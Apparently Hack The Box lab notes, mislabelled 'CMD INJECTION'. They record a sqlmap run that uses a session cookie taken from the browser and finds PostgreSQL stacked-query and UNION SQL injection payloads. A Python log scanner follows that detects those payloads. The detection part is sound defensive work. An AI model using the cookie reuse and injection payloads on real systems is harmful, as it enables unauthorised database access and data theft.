CMD INJECTION
#Identify vulnerable SQLi entry points
root@htb:~$ which sqlmap
/usr/bin/sqlmap
root@htb:~$ sqlmap -hh
...
Usage: python3 sqlmap [options]
...
root@htb:~$ BROWSER > http://10.129.95.174/dashboard.php?search=null > F12 > Storage > Cookies >
PHPSESSID:rgqtj2q53rvk6mlva0plqu7tsu
* the cookie is required for authentication
- this implies that the logged-in user has elevated privileges (admin)
root@htb:~$ sqlmap -u 'http://10.129.95.174/dashboard.php?search=null' --cookie="PHPSESSID=rgqtj2q53rvk6mlva0plqu7tsu"
...
[13:50:27] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n]
[13:50:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[13:50:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[13:50:32] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[13:50:32] [WARNING] reflective value(s) found and filtering out
[13:50:32] [INFO] target URL appears to have 5 columns in query
[13:50:32] [INFO] GET parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: search (GET)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: search=null';SELECT PG_SLEEP(5)--
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: search=null' UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(120)||CHR(106)||CHR(113))||(CHR(87)||CHR(80)||CHR(104)||CHR(72)||CHR(107)||CHR(115)||CHR(73)||CHR(112)||CHR(109)||CHR(115)||CHR(111)||CHR(74)||CHR(108)||CHR(73)||CHR(100)||CHR(101)||CHR(74)||CHR(86)||CHR(119)||CHR(66)||CHR(82)||CHR(74)||CHR(77)||CHR(87)||CHR(113)||CHR(111)||CHR(110)||CHR(103)||CHR(66)||CHR(122)||CHR(78)||CHR(80)||CHR(102)||CHR(85)||CHR(75)||CHR(101)||CHR(85)||CHR(72)||CHR(77)||CHR(121))||(CHR(113)||CHR(113)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL-- neMF
---
[13:50:34] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[13:50:34] [INFO] fetched data logged to text files under '/home/str1f3/.local/share/sqlmap/output/10.129.95.174'
[*] ending @ 13:50:34 /2025-04-17/
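Defender-side counterpart to the run above, added here as an example (not part of the original notes and not sqlmap's own code): the two payload families sqlmap reported against `search` (a stacked `';SELECT PG_SLEEP(5)--` query and a `UNION ALL SELECT` that builds strings from `CHR()||CHR()` chains) leave recognisable traces in the web server's access log. The script parses Apache combined-format lines, URL-decodes each query parameter, and flags those indicators plus sqlmap's default User-Agent. The log lines, source IPs and User-Agent strings are constructed for the example; the regexes are assumptions about what such probes look like, not a vendor signature set.

```python
"""Flag sqlmap-style SQL injection probes in Apache access logs.

Added example, not from the original notes. The indicators mirror the two
payload families reported in the sqlmap run (stacked PG_SLEEP() query and
UNION ALL SELECT with CHR()-built strings).
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" log format. The sample lines below are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# (indicator name, regex applied to a URL-decoded parameter value)
INDICATORS = [
    # quote closed, then a second statement: the "stacked queries" technique
    ("stacked_query", re.compile(r"['\"]\s*;\s*(select|insert|update|delete|drop)\b", re.I)),
    # PostgreSQL time-based probe used to confirm stacked queries
    ("time_based_pg_sleep", re.compile(r"\bpg_sleep\s*\(", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    # three or more CHR() calls joined with || is how sqlmap builds quote-free strings
    ("chr_concat_chain", re.compile(r"(chr\s*\(\s*\d+\s*\)\s*\|\|\s*){3,}", re.I)),
    # trailing SQL comment that discards the rest of the original query
    ("sql_comment_terminator", re.compile(r"--\s*\S*$|/\*.*\*/")),
]

# Constructed sample log: one benign request, two sqlmap probes, one benign search.
SAMPLE_LOG = [
    '10.10.14.5 - - [17/Apr/2025:13:50:27 +0000] "GET /dashboard.php?search=null HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [17/Apr/2025:13:50:27 +0000] "GET /dashboard.php?search=null%27%3BSELECT%20PG_SLEEP%285%29-- HTTP/1.1" 200 1834 "-" "sqlmap/1.9#stable (https://sqlmap.org)"',
    '10.10.14.5 - - [17/Apr/2025:13:50:32 +0000] "GET /dashboard.php?search=null%27%20UNION%20ALL%20SELECT%20NULL%2C%28CHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28120%29%7C%7CCHR%28106%29%29%2CNULL%2CNULL%2CNULL--%20neMF HTTP/1.1" 200 2210 "-" "sqlmap/1.9#stable (https://sqlmap.org)"',
    '10.10.14.9 - - [17/Apr/2025:13:51:02 +0000] "GET /dashboard.php?search=pentest%20report HTTP/1.1" 200 1902 "-" "Mozilla/5.0"',
]


def decode_params(target):
    """Return {param: [decoded values]} for the query string of a request target.

    Splits on '&' only, so a ';' inside a payload stays in the value instead of
    being treated as a parameter separator (older urllib.parse.parse_qs did that).
    """
    params = {}
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def scan_line(line):
    """Return [(param, indicator), ...] for one log line; [] if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    # Default UA is a cheap tell, but trivially changed; payload checks matter more.
    if m.group("ua").lower().startswith("sqlmap/"):
        findings.append(("user-agent", "sqlmap_default_ua"))
    for param, values in decode_params(m.group("target")).items():
        for value in values:
            for name, rx in INDICATORS:
                if rx.search(value):
                    findings.append((param, name))
    return findings


def scan_log(lines):
    """Group findings per source IP so repeated probes from one host stand out."""
    by_ip = {}
    for line in lines:
        m = LOG_RE.match(line)
        hits = scan_line(line)
        if m and hits:
            by_ip.setdefault(m.group("ip"), []).extend(hits)
    return by_ip


def summarize(by_ip):
    """Collapse per-IP findings to a sorted list of distinct indicator names."""
    return {ip: sorted({name for _, name in hits}) for ip, hits in by_ip.items()}


if __name__ == "__main__":
    for ip, names in summarize(scan_log(SAMPLE_LOG)).items():
        print(f"{ip}: {', '.join(names)}")
```

Run it over a real access log by replacing `SAMPLE_LOG` with the file's lines; the combination of `stacked_query` and `time_based_pg_sleep` from one host within seconds is the signature of the first technique sqlmap confirmed above, and `union_select` with `chr_concat_chain` is the second. Parameterised queries on the application side (so `search` is never concatenated into SQL) remove the root cause; the log check only tells you someone is probing.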